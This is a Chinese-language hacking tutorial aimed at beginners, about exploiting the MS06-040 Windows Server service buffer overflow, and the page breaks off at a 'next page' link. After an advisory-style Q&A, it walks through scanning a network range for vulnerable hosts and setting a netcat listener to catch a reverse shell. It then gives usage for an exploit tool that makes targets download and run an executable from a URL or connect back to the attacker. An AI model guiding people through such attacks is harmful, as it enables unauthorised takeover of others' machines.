菜鸟玩转溢出之MS06040篇

前言：
Ms06040（Server服务中的缓冲区溢出漏洞）是继ms06035以后的又一个重大漏洞，利用此漏洞的魔波蠕虫已经开始蔓延，相信互连网又会因此掀起血雨腥风。

此漏洞的影响范围有多大？
这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

造成漏洞的原因是什么？
Server 服务中未经检查的缓冲区。

什么是 Server 服务？
Server 服务通过网络提供 RPC 支持和文件打印支持以及命名管道共享。 Server 服务允许共享您的本地资源（例如磁盘和打印机），以便网络上的其他用户可以访问。 它还允许在其他计算机和您的计算机上运行的应用程序之间进行命名管道通信（用于 RPC）。

攻击者可能利用此漏洞执行什么操作？
成功利用此漏洞的攻击者可以完全控制受影响的系统。

哪些人可能会利用此漏洞？
任何可向受影响的系统传送特制消息的匿名用户都可以尝试利用此漏洞。

攻击者能够如何利用此漏洞？
攻击者可能试图通过创建特制的消息并将其发送到受影响的系统来利用此漏洞。 这样，这些消息可能导致受影响的系统执行代码。

受此漏洞威胁最大的系统有哪些？
所有工作站和服务器均受此问题的威胁，其中由于该漏洞的独特特征以及受影响的代码路径，Windows 2000 系统受到的威胁最大。

漏洞实战：
首先我们弄了个扫描工具：rpc-server Scanner
IP地址填入你想扫描的网段，点“扫描全部”
现在它已经开始工作了，去喝口水回来，已经全部扫描完毕

看到没,显示Vulnerable的就说明存在漏洞
我们来利用，首先在开始运行里打开CMD
用nc监听一个端口

我这输入“Nc –l –vv –p 8888”， 监听8888端口

现在我们开始溢出
这是它的说明

Usage: ms06040rpc.exe <host> <download url> <os type>
ms06040rpc.exe <host> <reverse addr> <revser port> <os type>
<download url>:
                such as:http://192.168.0.128/test.exe
<reverse addr>: your host ip address
<reverse port >:your host listenning port
<os type(1/2)>: 1: win 2000sp4 2:win xpsp1

[1] [2] 下一页